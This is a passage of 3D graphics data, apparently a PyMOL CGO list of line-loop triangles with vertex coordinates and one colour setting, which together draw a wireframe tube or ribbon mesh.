VERTEX, 23.157, 38.022, 28.531,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 22.979, 38.018, 28.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.931, 37.634, 28.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.956, 38.005, 28.157,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 22.916, 37.636, 28.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 23.102, 37.990, 27.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.066, 37.613, 27.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.330, 37.983, 27.957,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.293, 37.580, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.508, 37.987, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.463, 37.555, 28.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.531, 38.000, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.478, 37.553, 28.310,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.386, 38.015, 28.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.328, 37.576, 28.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.157, 38.022, 28.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 23.101, 37.609, 28.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 37.634, 28.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.853, 37.241, 28.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.916, 37.636, 28.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 22.847, 37.256, 28.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 23.066, 37.613, 27.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.002, 37.237, 27.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 23.293, 37.580, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.227, 37.194, 27.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.463, 37.555, 28.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.390, 37.152, 28.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.478, 37.553, 28.310,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.396, 37.136, 28.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.328, 37.576, 28.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.241, 37.156, 28.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.101, 37.609, 28.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 23.016, 37.199, 28.485,
END,
COLOR, 0.000, 0.969, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.853, 37.241, 28.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.772, 36.840, 28.337,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.847, 37.256, 28.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 22.774, 36.869, 28.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 23.002, 37.237, 27.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 22.936, 36.864, 27.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 23.227, 37.194, 27.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.163, 36.829, 27.944,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.390, 37.152, 28.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.322, 36.783, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.396, 37.136, 28.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.320, 36.754, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.241, 37.156, 28.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.158, 36.759, 28.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.016, 37.199, 28.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 36.794, 28.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.772, 36.840, 28.337,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.721, 36.429, 28.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.774, 36.869, 28.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 22.731, 36.471, 28.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.936, 36.864, 27.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 22.899, 36.496, 27.989,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 23.163, 36.829, 27.944,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.129, 36.490, 27.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.322, 36.783, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.284, 36.455, 28.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.320, 36.754, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.275, 36.413, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.158, 36.759, 28.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.107, 36.388, 28.541,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 22.931, 36.794, 28.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.877, 36.395, 28.533,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.721, 36.429, 28.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.720, 35.923, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.731, 36.471, 28.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.781, 36.144, 27.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.899, 36.496, 27.989,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 22.981, 36.334, 27.253,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.129, 36.490, 27.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.204, 36.383, 27.281,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.284, 36.455, 28.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.319, 36.260, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.275, 36.413, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.258, 36.039, 28.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.107, 36.388, 28.541,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 23.058, 35.849, 29.428,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 22.877, 36.395, 28.533,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.835, 35.800, 29.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 22.720, 35.923, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.860, 35.482, 28.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 22.781, 36.144, 27.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.937, 35.757, 27.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 22.981, 36.334, 27.253,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.126, 36.035, 27.369,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.204, 36.383, 27.281,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.315, 36.153, 27.423,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.319, 36.260, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.394, 36.043, 28.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.258, 36.039, 28.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.316, 35.769, 28.951,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.058, 35.849, 29.428,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 23.127, 35.490, 29.530,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 22.835, 35.800, 29.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.938, 35.372, 29.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 22.860, 35.482, 28.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 23.153, 35.087, 28.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 22.937, 35.757, 27.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 23.239, 35.416, 28.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.126, 36.035, 27.369,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.393, 35.769, 27.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.315, 36.153, 27.423,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.524, 35.941, 27.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.394, 36.043, 28.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.555, 35.829, 28.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.316, 35.769, 28.951,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.469, 35.500, 29.117,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.127, 35.490, 29.530,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 23.315, 35.147, 29.664,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 22.938, 35.372, 29.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 23.184, 34.975, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.153, 35.087, 28.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 23.540, 34.790, 29.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.239, 35.416, 28.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.627, 35.166, 28.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 23.393, 35.769, 27.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.741, 35.570, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 23.524, 35.941, 27.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.817, 35.765, 27.790,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 23.555, 35.829, 28.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.810, 35.636, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 23.469, 35.500, 29.117,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.723, 35.259, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 23.315, 35.147, 29.664,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 23.609, 34.855, 29.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.184, 34.975, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 23.533, 34.660, 29.705,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 23.540, 34.790, 29.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.959, 34.602, 29.163,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 23.627, 35.166, 28.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 24.037, 35.016, 28.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 23.741, 35.570, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 24.113, 35.451, 27.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 23.817, 35.765, 27.790,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 24.143, 35.653, 27.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 23.810, 35.636, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 24.109, 35.503, 28.601,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 23.723, 35.259, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 24.031, 35.089, 29.417,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 23.609, 34.855, 29.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.954, 34.654, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 23.533, 34.660, 29.705,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.925, 34.452, 29.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 23.959, 34.602, 29.163,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 24.396, 34.504, 29.277,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.037, 35.016, 28.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 24.459, 34.945, 28.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.113, 35.451, 27.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 24.498, 35.400, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.143, 35.653, 27.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 24.489, 35.601, 28.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.109, 35.503, 28.601,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 24.438, 35.432, 28.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.031, 35.089, 29.417,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 24.375, 34.990, 29.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 23.954, 34.654, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 24.336, 34.535, 30.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 23.925, 34.452, 29.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 24.345, 34.334, 29.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 24.396, 34.504, 29.277,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.839, 34.480, 29.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 24.459, 34.945, 28.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.883, 34.942, 28.606,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 24.498, 35.400, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.884, 35.407, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 24.489, 35.601, 28.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.842, 35.603, 28.237,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 24.438, 35.432, 28.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.782, 35.415, 28.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 24.375, 34.990, 29.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 24.738, 34.953, 29.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 24.336, 34.535, 30.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 24.737, 34.488, 30.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 24.345, 34.334, 29.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 24.779, 34.292, 30.038,
END,
BEGIN, LINE_LOOP,
